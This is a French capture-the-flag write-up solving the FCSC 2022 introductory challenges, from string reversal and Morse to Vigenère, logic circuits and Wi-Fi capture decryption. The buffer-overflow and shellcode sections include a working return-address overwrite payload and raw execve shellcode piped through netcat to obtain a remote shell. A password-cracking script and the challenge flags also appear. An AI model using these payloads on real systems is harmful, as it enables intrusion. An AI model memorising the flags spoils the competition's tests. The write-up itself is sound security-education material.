Cette page regroupe toutes les solutions de la catégorie Intro que j'étais motivé à rédiger. ;-)

[[_TOC_]]

# À l'envers

Connectez-vous au service en ligne donné ci-dessous, et pour chaque chaîne de caractères reçue, vous devez renvoyer la chaîne de caractères contenant les caractères dans l'ordre inverse.

Par exemple, pour la chaîne `ANSSI`, vous devez renvoyer `ISSNA` (note : le respect de la casse est important).

`nc challenges.france-cybersecurity-challenge.fr 2000`

**Solution**

Un petit script python :
```python
#!/usr/bin/env python3

import sys
from telnetlib import Telnet

if len(sys.argv) != 3:
    print(f'Syntax: {sys.argv[0]} host port')
    exit(-1)
host = sys.argv[1]
port = sys.argv[2]

with Telnet(host, port) as tn:
    tn.read_until(b'>>> ')
    msg = b''
    while b'FCSC{' not in msg:
        string = tn.read_until(b'\n')
        string = string.rstrip(b'\n')
        tn.write(string[::-1] +b'\n')
        print(f'{string.decode("utf-8")} => {string[::-1].decode("utf-8")}')
        msg = tn.read_until(b'>>> ')
        print(msg.decode('utf-8'))
```

Et le flag:
```
Congratulations!! Here is your flag:
FCSC{7b20416c4f019ea4486e1e5c13d2d1667eebac732268b46268a9b64035ab294d}
```

# Dépassement de tampon

On vous demande d'exploiter le binaire fourni pour lire le fichier `flag` qui se trouve sur le serveur distant.

Fichier: [pwn](pwn)

SHA256(`pwn`) = `b44030df647475507f65e910f71810b8d1633985cecef9d0862a702bcd308335`

`nc challenges.france-cybersecurity-challenge.fr 2050`

**Solution**

Il s'agit d'un binaire 64 bits.

```console
$ file pwn
pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cf1bd2c99cadd24d1e86964933b28aa0027ac464, for GNU/Linux 3.2.0, not stripped
```

Parmi les symboles, on voit une fonction `shell`:

```console
$ objdump -t pwn | grep ".text"
00000000004010c0 l    d  .text	0000000000000000              .text
0000000000401100 l     F .text	0000000000000000              deregister_tm_clones
0000000000401130 l     F .text	0000000000000000              register_tm_clones
0000000000401170 l     F .text	0000000000000000              __do_global_dtors_aux
00000000004011a0 l     F .text	0000000000000000              frame_dummy
00000000004012d0 g     F .text	0000000000000001              __libc_csu_fini
0000000000401270 g     F .text	000000000000005d              __libc_csu_init
00000000004010f0 g     F .text	0000000000000001              .hidden _dl_relocate_static_pie
00000000004010c0 g     F .text	000000000000002b              _start
00000000004011c1 g     F .text	00000000000000a6              main
00000000004011a2 g     F .text	000000000000001f              shell
```

On voit que cette fonction lance un /bin/bash :

```console
$ gdb pwn
diGEF for linux ready, type `gef' to start, `gef config' to configure
89 commands loaded for GDB 9.2 using Python engine 3.8
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from pwn...
(No debugging symbols found in pwn)
gef➤  disass shell
Dump of assembler code for function shell:
   0x00000000004011a2 <+0>:	push   rbp
   0x00000000004011a3 <+1>:	mov    rbp,rsp
   0x00000000004011a6 <+4>:	lea    rdi,[rip+0xe57]        # 0x402004
   0x00000000004011ad <+11>:	call   0x401030 <puts@plt>
   0x00000000004011b2 <+16>:	lea    rdi,[rip+0xe5d]        # 0x402016
   0x00000000004011b9 <+23>:	call   0x401040 <system@plt>
   0x00000000004011be <+28>:	nop
   0x00000000004011bf <+29>:	pop    rbp
   0x00000000004011c0 <+30>:	ret    
End of assembler dump.
gef➤  x/s 0x402004
0x402004:	"Enjoy your shell!"
gef➤  x/s 0x402016
0x402016:	"/bin/bash"
```

On suppose qu'il va falloir dépasser une limite de buffer dans le `main` pour écraser l'adresse de retour et rebondir dans `shell`. On y va doucement en incrémentant la taille de notre entrée petit à petit :

```console
gef➤  pattern create 60
[+] Generating a pattern of 60 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaa
gef➤  run 
Starting program: /home/wrxn5498/dev/challenges/FCSC/2022/intro/Dépassement de tampon/pwn 
>>> 1952200490 + 841113621 = aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaa
No!

Program received signal SIGSEGV, Segmentation fault.
0x0000000a6161616f in ?? ()
```

Bonne pioche ! On voit que le registre `rip` pointe sur `oaaa`. dans notre chaîne, on va remplacer cette partie, et un peu plus, vers l'adresse de `shell` (0x00000000004011a2) :

```console
$ python -c 'print("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaa\xa2\x11\x40\x00\x00\x00\x00\x00")' | ./pwn 
>>> 1931239255 + 507761507 = No!
Enjoy your shell!
Erreur de segmentation (core dumped)
```

C'est le moment de le lancer sur le site, en n'oubliant pas le `cat` qui permet de maintenir la connexion le temps de récupérer le flag :

```console
$ (python -c 'print("aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaa\xa2\x11\x40\x00\x00\x00\x00\x00")'; cat -) | nc challenges.france-cybersecurity-challenge.fr 2050
>>> 899237572 + 395375554 = ls
flag
pwn
cat flag
FCSC{5f25ae8fd59160b018e8ef21ff8972cdb2e3ab98e4f7bfced4e60255d378aee8}
```

# Hamac

Connaissez-vous l'existence de rockyou ?

Fichiers: [hamac.py](hamac.py) [output.txt](output.txt)

**Solution**

On analyse les fichiers fournis. On voit que `output.txt` est le résultat du script `hamac.py`. Ce dernier:
- prend un mot de passe en entrée.
- calcule le `HMAC` de ce mot de passe auquel on concatène une chaîne fixe.
- chiffre le flag avec ce `HMAC`.
- stocke l'IV et le chiffré du flag, ainsi que le `HMAC`.

L'énoncé mentionne rockyou, un fichier de mots de passe issus de la fuite des données du site [RockYou](https://en.wikipedia.org/wiki/RockYou) en 2009, connu de tous les casseurs de mot de passe. On suppose que le mot de passe utilisé pour chiffrer le flag fait partie de cette liste.

On va donc écrire un script, qui va commencer par initialiser les données contenues dans le fichier output.txt et charger la liste des mots de passe du fichier rockyou passé en paramètre:

```python
#!/usr/bin/env python3

# python3 -m pip install pycryptodome
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256

import sys
if len(sys.argv) != 2:
    print(f'Syntax: {sys.argv[0]} <rockyou>')
    exit(-1)

iv = bytes.fromhex('ea425b2ea4bb67445abe967e3bd1b583')
c = bytes.fromhex('69771c85e2362a35eb0157497e9e2d17858bf11492e003c4aa8ce1b76d8d3a31ccc3412ec6e619e7996190d8693299fc3873e1e6a96bcc1fe67abdf5175c753c09128fd1eb2f2f15bd07b12c5bfc2933')
h = bytes.fromhex('951bd9d2caae0d9e9a5665b4fc112809aac9f5f9ecbcfc5ad8e23cb1d020201d')

passwords = open(sys.argv[1], "rb").readlines()
passwords = [ p[:-1] for p in passwords ]
```

Puis on itère le calcul du `HMAC` sur tous les mots de passe, et on l'utilise pour déchiffrer le flag. Si celui-ci contient ce qui ressemble à un flag valide, on l'affiche :

```python
for password in passwords:
    h = HMAC.new(password, digestmod = SHA256)
    h.update(b"FCSC2022")
    k  = SHA256.new(password).digest()

    cipher = AES.new(k, AES.MODE_CBC, iv = iv)
    flag = cipher.decrypt(c)
    if b'FCSC{' in flag:
        print(f'{password.decode("utf-8")} => {flag.decode("utf-8")}')
        exit(0)
```

À l'exécution :
```console
$ ./solve.py  /opt/hashcat/wordlist/rockyou.txt 
omgh4xx0r => FCSC{5bb0780f8af31f69b4eccf18870f493628f135045add3036f35a4e3a423976d6}
```


# QR Code

Nous avons récupéré ce QRcode que nous n'arrivons pas à lire : pouvez-vous nous aider ?

![qrcode](qrcode1.png)

**Solution**

Ce QR code paraît bizarre. En effet, il semble manquer des éléments aux trois carrés dans les coins. On les rajoute rapidement avec un éditeur d'image :

![qrcode](qrcode2.png)

Celui-ci est parfaitement décodable, et donne le flag `FCSC{0eea6160d40720fe795adfad6371d78b074dac9c234bfd94f6a94c0c72702a2f}`.

# Wi-Fi

Saurez-vous déchiffrer cette capture Wi-Fi ?

Le mot de passe du réseau est `FCSC p0w3r is the answer`.

Fichier: [intro-wifi.pcap.xz](intro-wifi.pcap.xz)

SHA256(`intro-wifi.pcap.xz`) = `ef484cf1bde9f6f57fe606ed4e259a585f5b5c023acbdf567d712c31a2396f7c`.

**Solution**

Une rapide analyse de la capture montre que le trafic Wifi est protégé par `WPA-PWD`, et le mot de passe nous est donné. Ainsi, on peut suivre [ces instructions](https://wiki.wireshark.org/HowToDecrypt802.11) pour que Wireshark déchiffre la capture. Dans le résultat, on trouve des paquets `HTTP` :

```
GET /my_precious HTTP/1.1
User-Agent: Wget/1.21
Accept: */*
Accept-Encoding: identity
Host: 192.168.21.224
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.9.2
Date: Fri, 18 Mar 2022 19:54:54 GMT
Content-type: application/octet-stream
Content-Length: 71
Last-Modified: Fri, 18 Mar 2022 19:52:33 GMT

FCSC{60d67d7de8aadb7d1241de9a6fdf9148982d2363eab88e862bb98402ac835c8f}
```

#  Shellcode

Connaissez-vous le principe d'un shellcode ?

Fichier : [execut0r](execut0r)

SHA256(`execut0r`) = `3980b324c99371125949ed18fffde9320f17c0c11da1e3aa6c7cb8580429cdbf`.

`nc challenges.france-cybersecurity-challenge.fr 2051`

**Solution**

Le binaire attend une saisie sur l'entrée standard, puis... crashe. On suppose qu'il considère la saisie comme un shellcode et tente de l'exécuter. On va chercher [un shellcode sur exploit-db](https://www.exploit-db.com/shellcodes/46907) et on le lance à travers le netcat du serveur :

```console
$ (python -c 'print("\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05")' ; cat -) | nc challenges.france-cybersecurity-challenge.fr 2051
ls
execut0r
flag.txt
cat flag.txt
FCSC{9f8a2eb6fbb26644dab670f1a948c449ba36102417efc3e40c3bd4774bfb4f7a}
```

#  Baby Morse

Dites `FLAG` et vous l'aurez.

`nc challenges.france-cybersecurity-challenge.fr 2250`

**Solution**

Ça va être court...

```console
$ nc challenges.france-cybersecurity-challenge.fr 2250
--.- ..- . ...- --- ..- .-.. . --.. ...- --- ..- ...    # NdA: QUEVOULEZVOUS
>>> ..-. .-.. .- --.
Bien joué, le flag est :
FCSC{de8b4af784cd394ecc305979ffa124a112a18046037b42c94e4e85216180847e}
```

# Header

Pour cette épreuve, vous devrez vous pencher sur une fonctionnalité essentielle du protocole HTTP.

https://header.france-cybersecurity-challenge.fr/

**Solution**

Le site pointé fournit son code source. L'extrait qui nous intéresse :

```js
    var verif = req.header("X-FCSC-2022");
    if (verif == "Can I get a flag, please?") {
        var flag = fs.readFileSync("flag.txt");
        res.status(200);
        res.render("pages/index", {
            type: "success",
            msg: "Here it is: " + flag,
        });
```

Donc il suffit d'ajouter un en-tête `X-FCSC-2022: Can I get a flag, please?` :

```console
$ curl -H "X-FCSC-2022: Can I get a flag, please?" https://header.france-cybersecurity-challenge.fr/
[...]
<div id="alert" class="alert alert-success">
    <strong>Here it is: FCSC{9ec57a4a72617c4812002726750749dd193d5fbbfeef54a27a9b536f00d89dfb}</strong>
</div>
[...]
```

#  À l'aise

Cette épreuve vous propose de déchiffrer un message chiffré avec la méthode inventée par Blaise de Vigénère.

La clé est `FCSC` et le message chiffré :

```
Gqfltwj emgj clgfv ! Aqltj rjqhjsksg ekxuaqs, ua xtwk
n'feuguvwb gkwp xwj, ujts f'npxkqvjgw nw tjuwcz
ugwygjtfkf qz uw efezg sqk gspwonu. Jgsfwb-aqmu f
Pspygk nj 29 cntnn hqzt dg igtwy fw xtvjg rkkunqf.
```

Le flag est le nom de la ville mentionnée dans ce message.

> Attention, vous n'avez le droit qu'à 3 tentatives !

**Solution**

On peut simplement passer sur [Ars Cryptographica](https://www.apprendre-en-ligne.net/crypto/vigenere/index.html), ouvrir la page qui parle du chiffrement de Vigenère, et utiliser l'applet fournie. Déchiffré, le code dit :

```
BONJOUR CHER AGENT ! VOTRE PROCHAINE MISSION,SI VOUS 
L'ACCEPTEZ BIEN SUR, SERA D'INFILTRER LE RESEAU 
SOUTERRAIN OU SE CACHE NOS ENNEMIS. RENDEZ-VOUS A
NANTES LE 29 AVRIL POUR LE DEBUT DE VOTRE MISSION
```

Le flag est donc `FCSC{Nantes}`.

#  Ne pas jeter l'éponge

On vous donne le circuit logique ci-dessous, et on vous demande de donner la sortie binaire correspondante à l'entrée `(x0, x1, x2, x3, x4) = (1, 0, 0, 1, 1)`. Encadrez votre réponse entre `FCSC{}` pour obtenir le flag.

En guise d'exemple, `(x0, x1, x2, x3, x4) = (1, 0, 0, 0, 0)` donne `(y0, y1, y2, y3, y4) = (1, 0, 1, 0, 0)`, ce qui donnerait `FCSC{10100}` comme flag.

> Attention, vous n'avez le droit qu'à 3 tentatives !

![circuit](circuit.png)

**Solution**

En analysant le fichier, on détermine que les sorties suivent le calcul suivant: 

```math
y(n) = x(n) \oplus ( x(n-2) \And \neg x(n-1) )
```

Évidemment, les indices sont modulo 5. En python, cela donne :

```python
>>> def compute(x):
...   y = map(lambda n: x[n%5] ^ ( x[(n-2)%5] and not x[(n-1)%5] ), range(5))
...   return 'FCSC{' + ( ''.join( map(str, y) ) ) + '}'
...
```

On teste sur l'exemple donné :

```python
>>> compute([1,0,0,0,0])
'FCSC{10100}'
```

C'est bon ! Le flag maintenant :

```python
>>> compute([1,0,0,1,1])
'FCSC{10111}'
```

# Seven Sins

On vous donne un afficheur sept segments relié à des entrées que vous maîtrisez numérotées de `Bit 0` à `Bit 8` comme indiqué sur l'image : 

![7segments](7segments.png)

Il vous est demandé de fournir les 8 suites de 9 bits fournissant la sortie séquentielle suivante : 

![fcsc2022](fcsc2022.png)

> Attention : le flag est FCSC{XXX} où XXX est la suite de bits retrouvée (donc une suite de charactères '0' et '1').
> **Exemple** : le flag pour la suite de chiffres 789 serait FCSC{011100100111111110111101110}

**Solution**

On fait [un saut sur wikipedia](https://en.wikipedia.org/wiki/Seven-segment_display) pour déterminer à quoi correspondent les segments `a` à `g`, `Enable` et `DP` :

![wikipedia](7segments_wikipedia.png)

On voit aussi à l'aide de l'exemple que `Enable` (que j'ai représenté plus bas avec le signe `+`) doit être envoyé après chaque digit. On en déduit les segments à allumer pour chaque lettres de la sortie attendue :

```
F  AFEG+
C  AFED+
S  AFGCD+
C  AFED+
2  ABGED+
0  ABFCED+
2  ABGED+
2. ABGED.+
```

Feignant jusqu'au bout, c'est python qui me donne encore la réponse :

```python
>>> code = ['AFEG+', 'AFED+', 'AFGCD+', 'AFED+', 'ABGED+', 'ABFCED+', 'ABGED+', 'ABGED.+']
>>> ''.join( map( str, [ 1 if digit in car else 0 for car in code for digit in 'DCBAEF+G.' ] ) )
'000111110100111100110101110100111100101110110111111100101110110101110111'
```

Le flag est donc `FCSC{000111110100111100110101110100111100101110110111111100101110110101110111}`.